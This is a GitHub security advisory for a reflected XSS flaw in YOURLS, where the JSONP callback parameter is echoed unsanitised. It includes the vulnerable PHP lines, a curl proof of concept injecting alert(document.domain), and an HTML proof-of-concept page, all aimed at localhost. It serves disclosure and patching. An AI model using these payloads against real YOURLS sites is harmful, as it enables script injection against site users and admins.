GHSA-6MP4-Q625-MXJP
Vulnerability from github – Published: 2025-12-30 19:34 – Updated: 2025-12-30 19:34
VLAI?
Summary
YOURLS is vulnerable to XSS through JSONP and Callback request parameters
Details
Summary
The callback and jsonp request parameters are directly concatenated into the response without any sanitization that allowing attackers to inject arbitrary JS code. When YOURLS_PRIVATE is set to false (public API mode), this vulnerability can be exploited by any unauthenticated attacker. In private mode, the XSS payload is still injected into the 403 response body though browser execution is blocked.
Details
Vulnerability exists in the JSONP callback handling chain:
yourls-api.php:127-128
if( isset( $_REQUEST['callback'] ) )
$return['callback'] = $_REQUEST['callback'];
elseif ( isset( $_REQUEST['jsonp'] ) )
$return['callback'] = $_REQUEST['jsonp'];
includes/functions-api.php:127-128
$callback = isset( $output['callback'] ) ? $output['callback'] : '';
$result = $callback . '(' . json_encode( $output ) . ')';
PoC
I. YOURLS instance with YOURLS_PRIVATE set to false in config.php or user authenticated to a private YOURLS instance.
II. curl "http://localhost:8080/yourls-api.php?action=version&format=jsonp&callback=alert(document.domain)//"
Expected response: alert(document.domain)//({"version":"1.10.2","callback":"alert(document.domain)\/\/"})
Browser PoC file:
<!DOCTYPE html>
<html>
<head><title>pwn</title></head>
<body>
<h1>pwn</h1>
<script src="http://localhost:8080/yourls-api.php?action=version&format=jsonp&callback=alert('pwn');//"></script>
</body>
</html>
Impact
Public Mode (YOURLS_PRIVATE=false): Full exploitation, any unauthenticated user can trigger XSS. Private Mode (YOURLS_PRIVATE=true): XSS payload is injected into 403 response body but browser blocks script execution. However, authenticated users or admins accessing malicious links are still vulnerable.
Severity ?
7.1 (High)
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "yourls/yourls"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.10.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-30T19:34:26Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe callback and **jsonp** request parameters are directly concatenated into the response without any sanitization that allowing attackers to inject arbitrary JS code. When **YOURLS_PRIVATE** is set to **false** (public API mode), this vulnerability can be exploited by any unauthenticated attacker. In private mode, the XSS payload is still injected into the 403 response body though browser execution is blocked.\n\n### Details\n\nVulnerability exists in the JSONP callback handling chain:\n\n```\nyourls-api.php:127-128\n\nif( isset( $_REQUEST[\u0027callback\u0027] ) )\n $return[\u0027callback\u0027] = $_REQUEST[\u0027callback\u0027];\nelseif ( isset( $_REQUEST[\u0027jsonp\u0027] ) )\n $return[\u0027callback\u0027] = $_REQUEST[\u0027jsonp\u0027]; \n```\n---\n\n```\nincludes/functions-api.php:127-128\n\n$callback = isset( $output[\u0027callback\u0027] ) ? $output[\u0027callback\u0027] : \u0027\u0027;\n$result = $callback . \u0027(\u0027 . json_encode( $output ) . \u0027)\u0027;\n```\n\n### PoC\n\nI. YOURLS instance with YOURLS_PRIVATE set to false in config.php or user authenticated to a private YOURLS instance.\n\nII. `curl \"http://localhost:8080/yourls-api.php?action=version\u0026format=jsonp\u0026callback=alert(document.domain)//\"\n`\n**Expected response:** `alert(document.domain)//({\"version\":\"1.10.2\",\"callback\":\"alert(document.domain)\\/\\/\"})`\n\nBrowser PoC file:\n\n```\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\u003ctitle\u003epwn\u003c/title\u003e\u003c/head\u003e\n\u003cbody\u003e\n\u003ch1\u003epwn\u003c/h1\u003e\n\u003cscript src=\"http://localhost:8080/yourls-api.php?action=version\u0026format=jsonp\u0026callback=alert(\u0027pwn\u0027);//\"\u003e\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Impact\n\nPublic Mode (YOURLS_PRIVATE=false): Full exploitation, any unauthenticated user can trigger **XSS.**\nPrivate Mode (YOURLS_PRIVATE=true): XSS payload is injected into 403 response body but browser blocks script execution. However, authenticated users or admins accessing malicious links are still vulnerable.",
"id": "GHSA-6mp4-q625-mxjp",
"modified": "2025-12-30T19:34:26Z",
"published": "2025-12-30T19:34:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/YOURLS/YOURLS/security/advisories/GHSA-6mp4-q625-mxjp"
},
{
"type": "WEB",
"url": "https://github.com/YOURLS/YOURLS/commit/b1c6100e0aa6fef58c9c1a394ccc19352c3a480a"
},
{
"type": "PACKAGE",
"url": "https://github.com/YOURLS/YOURLS"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "YOURLS is vulnerable to XSS through JSONP and Callback request parameters"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…